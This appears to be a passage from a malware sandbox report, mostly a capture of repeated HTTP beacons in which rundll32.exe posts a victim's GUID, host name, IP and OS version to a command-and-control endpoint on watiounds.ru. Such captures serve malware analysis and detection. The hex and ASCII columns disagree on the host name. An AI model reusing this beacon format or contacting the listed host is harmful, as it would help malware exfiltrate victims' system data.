                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:51.732634068 CEST  398  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          325         192.168.2.22  49490        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:52.048403025 CEST  399  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:52.175792933 CEST  399  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4d 4e 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBMNYARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          326         192.168.2.22  49491        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:52.524066925 CEST  400  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:52.651070118 CEST  400  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZTGAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          327         192.168.2.22  49492        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:52.967845917 CEST  401  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.092612028 CEST  401  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJNMQARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          328         192.168.2.22  49493        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:53.414556026 CEST  402  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.540388107 CEST  402  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          329         192.168.2.22  49494        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:53.866784096 CEST  403  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.995656013 CEST  404  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          33          192.168.2.22  49198        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:21:38.262934923 CEST  72  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:38.388016939 CEST  72  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          330         192.168.2.22  49495        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:54.314910889 CEST  404  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:54.445449114 CEST  405  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          331         192.168.2.22  49496        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:54.771280050 CEST  405  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:54.917239904 CEST  406  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          332         192.168.2.22  49497        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:55.234579086 CEST  406  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:55.359719992 CEST  407  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          333         192.168.2.22  49498        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:55.684708118 CEST  408  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:55.811392069 CEST  408  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJHSQARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          334         192.168.2.22  49499        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:56.137103081 CEST  409  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:56.260298967 CEST  409  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          335         192.168.2.22  49500        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:56.577138901 CEST  410  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:56.700835943 CEST  410  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          336         192.168.2.22  49501        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:57.032484055 CEST  411  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:57.159640074 CEST  411  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          337         192.168.2.22  49502        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:57.477037907 CEST  412  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:57.604276896 CEST  412  IN  HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYAZBARRABw==0


                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                          338         192.168.2.22  49503        95.47.161.162   80                C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp  kBytes transferred  Direction  Data
                                          Apr 29, 2021 08:23:57.930341959 CEST  413  OUT  POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.052639008 CEST | 414 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          339 | 192.168.2.22 | 49504 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:58.369174957 CEST | 414 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.493335962 CEST | 415 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          34 | 192.168.2.22 | 49199 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:38.714252949 CEST | 73 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:38.843950033 CEST | 73 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
